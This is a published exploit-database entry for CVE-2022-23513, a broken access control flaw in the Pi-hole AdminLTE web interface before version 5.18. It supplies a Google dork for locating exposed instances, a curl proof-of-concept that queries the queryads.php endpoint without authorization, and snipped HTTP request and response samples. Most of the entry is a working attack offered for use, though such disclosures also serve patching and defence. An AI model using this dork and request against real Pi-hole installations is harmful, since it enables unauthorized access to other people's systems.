Share
## https://sploitus.com/exploit?id=PACKETSTORM:174460
# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control  
# Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554)  
# Date: 21.12.2022  
# Exploit Author: kv1to  
# Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17  
# Tested on: Raspbian / Debian  
# Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497  
# CVE : CVE-2022-23513  
  
In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint.  
  
## Proof Of Concept with curl:  
curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>'  
  
## HTTP requests  
GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1  
HOST: pi.hole  
Cookie: [..SNIPPED..]  
[..SNIPPED..]  
  
## HTTP Response  
HTTP/1.1 200 OK  
[..SNIPPED..]  
  
data: Match found in [..SNIPPED..]  
data: <domain>  
data: <domain>  
data: <domain>